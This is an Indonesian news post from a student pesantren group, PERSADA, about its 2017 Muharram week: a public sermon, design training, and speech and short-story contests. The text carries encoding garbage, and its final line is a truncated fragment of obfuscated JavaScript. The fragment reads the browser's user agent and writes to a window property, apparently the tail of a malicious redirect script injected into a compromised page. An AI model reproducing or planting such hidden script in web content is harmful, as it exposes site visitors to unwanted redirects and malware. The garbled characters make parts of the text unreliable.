Pekan Muharram Santri PERSADA (1439 H)

Alhamdulillah, masih diberi kesempatan oleh Allah untuk merasakan tahun 1439 Hijriyah, yangAi?? diawali dengan bulan Muharram. Muharram merupakan bulan yang penting dan mulia bagi umat muslim karena banyak peristiwa besar terjadi didalamnya. Salah satunya hijrah yang dilakukan oleh Rasululllah SAW. Oleh karena itu, PERSADA tidak mau melewatkan bulan ini dan mengadakan kegiatan-kegiatan yang dapat memotivasi semangat generasi muda (santri). PERSADA mengambil tema “Muharramku, Awal Hijrahku” sebagai landasan beberapa kegiatan yang akan dilaksanakan . Adapun rangkaian kegiatan pekan Muharram yaitu:

1. Tabligh Akbar yang dilaksanakan pada Jumai??i??at, 22 September 2017 M/ 3 Muharram 1439 H sebagai pembukaan pekan Muharram 1439 H yang diisi oleh Al-Ustadz H. Bachtiar Nasir, Lc., MM. (Ketua GNPF-MUI, Majelis Tarjih dan Tajdid PP Muhammadiyah) dengan tema Hijrah Bersama Al-Qurai??i??an bertempat di Masjid Ahmad Dahlan kompleks Islamic Center Kampus 4 UAD. Tabligh akbar ini dibuka untuk umum dan banyak yang datang mengikuti ceramah dari beliau.

1. Pelatihan dan Perlombaan Design grafis Santri yang dilaksanakan pada hari Ahad, 8 Oktober 2017 di Musholla Putra Pesantren Mahasiswa KH. Ahmad Dahlan (Kampus 4 UAD). Setelah diadakannya pelatihan, nantinya hasil design santri dari pelatihan tersebut akan dilombakan dan dipilih yang hasil yang bagus.

1. Lomba Pidato santri yang dilaksanakan pada kamis, 12 Oktober 2017 di Aula Masjid Islamic Center. Banyak santri yang mengikuti perlombaan pidato ini dan menampilkan yang terbaik.

1. Lomba penulisan cerpen, batas pengumpulan sampai tanggal 14 Oktober 2017 di email Persada. Alhamdulillah, ada 14 cerpen yang sudah masuk.

Semua hasil perlombaan tersebut akan diumumkan hari Kamis, 19 Oktober 2017 di Aula Masjid Islamic Center.

6d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}